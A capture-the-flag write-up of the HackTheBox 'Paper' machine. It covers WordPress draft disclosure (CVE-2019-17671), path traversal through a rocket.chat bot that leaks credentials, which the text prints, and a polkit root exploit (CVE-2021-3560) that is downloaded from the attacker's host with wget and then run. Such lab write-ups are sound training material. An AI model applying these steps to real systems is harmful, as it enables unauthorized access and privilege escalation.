Paper - [HTB]

Cover Image for Paper - [HTB]
Marmeus
Marmeus

Introduction

Paper is a pretty easy Linux machine from HackTheBox where the attacker will have to exploit a WordPress vulnerability (CVE-2019-17671), so we can get access to a chat web application, exploiting the services of a chatbot and becoming user. Finally, we will have to exploit the famous polkit vulnerability (CVE-2021-3560) in order to become root.

Enumeration

As always, let's start finding all opened ports in the machine with Nmap.

kali@kali:~/Documents/HTB/Paper$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.11.143
Warning: 10.10.11.143 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.143
Host is up (0.043s latency).
Not shown: 61511 closed ports, 4021 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
kali@kali:~/Documents/HTB/Paper$

Then, we continue with a deeper scan of each opened port, getting more information about each service.

kali@kali:~/Documents/HTB/Paper$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80,443 10.10.11.143
Nmap scan report for 10.10.11.143
Host is up (0.042s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 14 15:19:20 2022 -- 1 IP address (1 host up) scanned in 16.38 seconds

Looking at the HTTP headers, we can find the domain office.paper.

kali@kali:~/Documents/HTB/Paper$ curl -i http://10.10.11.143/asdasd
HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2022 21:09:28 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

Once added to /etc/hosts, we can access 's WordPress page.

Blunder Tiffin

Thanks to wpscan, we can know that this WordPress version has an associated vulnerability.

kali@kali:~/Documents/HTB/Paper$ wpscan --url http://office.paper/ -e ap,at,dbe,u --random-user-agent --detection-mode aggressive --plugins-detection aggressive --disable-tls-checks
[...]
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/

We can exploit accessing the URL http://office.paper/?static=1, obtaining a bunch of drafts. Between the drafts, we can see a register link.

test

Micheal please remove the secret from drafts for gods sake!

Hello employees of Blunder Tiffin,

Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.

So, I kindly request you all to take your discussions from the public blog to a more private chat system.

-Nick

# Warning for Michael

Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick

Threat Level Midnight

A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT

[INT:DAY]

Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….

# Secret Registration URL of new Employee chat system

http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.

# Also, stop looking at my drafts. Jeez!

This link leads us to a rocket.chat web application.

rocket.chat

Once registered and logged in, we can find a bot on the general with instructions about how to use it.

Bot chat

To interact with recyclops, we need to create a private chat.

Recyclops private chat

As we can see, recyclops can list files under the /sales/ folder.

image-20220214221736794

Moreover, it is vulnerable to Path Traversal, so we can list files from upper directories.

dwight's home directory

Under the ../hubot/ directory there is a .env file .

hubot files

The .env contains recyclop's credentials.

Configuration file

These credentials can be used to get the machine as Dwight through SSH.

kali@kali:~/Documents/HTB/Paper$ ssh dwight@office.paper
dwight@office.paper's password: Queenofblad3s!23

[dwight@paper ~]$ cat user.txt 
[CENSORED]

Privilege Escalation

Using Linpeash, we find that the polkit binary is a SUID binary.

SUID - Check easy privesc, exploits and write perms
-rwsr-xr-x. 1 root root  61K May 11  2019 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)            
-rwsr-xr-x  1 root root  34K May 11  2019 /usr/bin/fusermount3             
-rwsr-xr-x. 1 root root  38K May 11  2019 /usr/bin/fusermount
-rwsr-xr-x. 1 root root  18K May 11  2019 /usr/lib/polkit-1/polkit-agent-helper-1               
-rwsr-xr-x  1 root root  65K Nov  8  2019 /usr/bin/crontab
-rwsr-xr-x  1 root root  33K Apr  6  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                           
-rwsr-xr-x  1 root root  21K Feb  2  2021 /usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper (Unknown SUID binary)

So, we can exploit it becoming root with the following exploit.

[dwight@paper tmp]$ wget http://10.10.14.223/CVE-2021-3560.py
--2022-02-14 17:06:44--  http://10.10.14.223/CVE-2021-3560.py
Connecting to 10.10.14.223:80... connected.
HTTP request sent, awaiting response... 200 OK                                          
Length: 2434 (2.4K) [text/plain]                                             
Saving to: ‘CVE-2021-3560.py’                                                       
CVE-2021-3560.py         100%[==============>]   2.38K  --.-KB/s    in 0s       
2022-02-14 17:06:44 (295 MB/s) - ‘CVE-2021-3560.py’ saved [2434/2434]                                                                                                                                                                                                  
[dwight@paper tmp]$ python3 CVE-2021-3560.py 
[...]
[+] Timed out at: 0.00890119250816805
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 
bash: cannot set terminal process group (79814): Inappropriate ioctl for device
bash: no job control in this shell
[root@paper tmp]#  cat /root/root.txt
[CENSORED]